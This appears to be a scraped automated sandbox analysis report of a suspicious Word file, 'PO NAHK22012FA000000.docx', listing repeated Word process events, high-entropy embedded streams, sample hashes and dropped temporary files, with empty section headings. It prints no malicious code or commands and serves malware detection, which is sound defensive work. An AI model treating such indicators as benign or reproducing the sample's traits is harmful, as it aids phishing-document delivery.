Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: PO NAHK22012FA000000.docx	Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRD0000.tmp.0.dr	Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr	Stream path '_1791189376/CONTENTS' entropy: 7.98640213683 (max. 8.0)

ID:	1540372
Product:	CloudBasic
Start time:	17:49:08
Start date:	23.10.2024
Sample:	PO NAHK22012FA000000.docx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	48dd0e8d2647a5d093f64f186dcac877
SHA1:	258650076b605d2d46984016ad2986e7e41b6b9e
SHA256:	e24a47e78d936fa0738d80c11910fbdf8d90d384c7584c355d56a94252323f16
Filetype:	Word Microsoft Office Open XML Format document (49504/1) 58.23%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)	data	2657E084B6899E3EF5A03FED2E6DF945	1829D53BA4FCB59EC05F5783DF5348341B780083	839358868337A62D9625471886C583EE00CAF15F2DD53F462511C5033820341D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C075331.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	F243041BE67BE5A73D89A294CE9FD0CB	4E273C0C5A9343F825EBE0C5C74DC224D156CC35	8E8EAACF577CCBDB358B7F90BDD533BE90494B6F29ADAF50C86559CFD9F9F93A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\774DBF7E.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	16D17119385717EB030C09137CFC2F1D	F18DF1B6783088BA15A1773A85C6E01D4CD75484	847936068167A69D977F1876C628CF24E2098A22791438691A9DD989F9A685F1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC8CED67.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	764EDEB272A488585426FCAD198077BD	ED41AA518AFDAAF487887889E799CA6FD0ECECF6	9E7F18A268E22FF3D2AFC93E0C66F5FD47A570DDF1D1739165C6FCE9745FE7DC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp	Composite Document File V2 Document, Cannot read section info	04F2BDDB72BD5360336BAB4C11FE593A	A7FAFEA883A989BC4851D95BECA9B75AD6D96DA6	9993ED429710C5515C88ACE6F853D113D1E66E5BAEE7CACDE5CBD79F1B065E9A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{57F82215-74BF-4E58-B177-BFDD3F7EBA9A}.tmp	data	BDB4092A6D55AA55FF69EE6B013EA8AB	8E636F38B9D0601AF0CC2EA023D8E11FFAE40CE6	7EB68E3C0DABC59C5B3DB17925AF666ED7036998F845BA30D5E6ABC93F3B6827
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE9AD520-4EB5-4337-9147-8A3BC8A776F2}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\{84694DAC-05D5-4C99-B045-630DEA859D5C}	data	3D40F0AB5B7AC9BE40F8A6710AF84233	70AA66915BBCC2AD684600D05B6298AF8B3216E4	E406C995B218537851584D12ADD7D6159BC51920C742A61E8632CD68C40D4150
C:\Users\user\AppData\Local\Temp\{9A4C3352-153F-4619-A431-94F1F5FBEBE6}	data	2657E084B6899E3EF5A03FED2E6DF945	1829D53BA4FCB59EC05F5783DF5348341B780083	839358868337A62D9625471886C583EE00CAF15F2DD53F462511C5033820341D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO NAHK22012FA000000.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Wed Oct 23 14:50:02 2024, length=464442, window=hide	3FA99EBCBDDC980A3F3C238044E47447	FACFC99B8E4C6303EF76F8DF0FDD098FE2815198	E8C2645F708E24F04EE7BF7B58AF236FCACE20B593C7868577E3FB7FD8B2A319
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	Generic INItialization configuration [folders]	CFE23771994C01B94446FB7E34D51995	19DF2201F82C28E6310D95B122283AB629FA4E27	8D75957A8114D08815E6B8EDB83F4F99E49B26F2130A0C91FB0CD3CA3B493614
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED	95E13378EA9CACA068B2687F01E9EF13F56627C2	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
C:\Users\user\Desktop\PO NAHK22012FA000000.docx (copy)	Microsoft Word 2007+	5F812E0FB0A04215804082890159CA22	BB90FCF3EDB65162D4F92F55533585BD83AB813A	4B8C91F700C6EE9F57B33D54B26992EC5D656EAF7CD45F1BF7D350E500B1BA6C
C:\Users\user\Desktop\~$ NAHK22012FA000000.docx	data	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED	95E13378EA9CACA068B2687F01E9EF13F56627C2	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
C:\Users\user\Desktop\~WRD0000.tmp	Microsoft Word 2007+	5F812E0FB0A04215804082890159CA22	BB90FCF3EDB65162D4F92F55533585BD83AB813A	4B8C91F700C6EE9F57B33D54B26992EC5D656EAF7CD45F1BF7D350E500B1BA6C
C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

Windows Analysis Report
PO NAHK22012FA000000.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report PO NAHK22012FA000000.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
PO NAHK22012FA000000.docx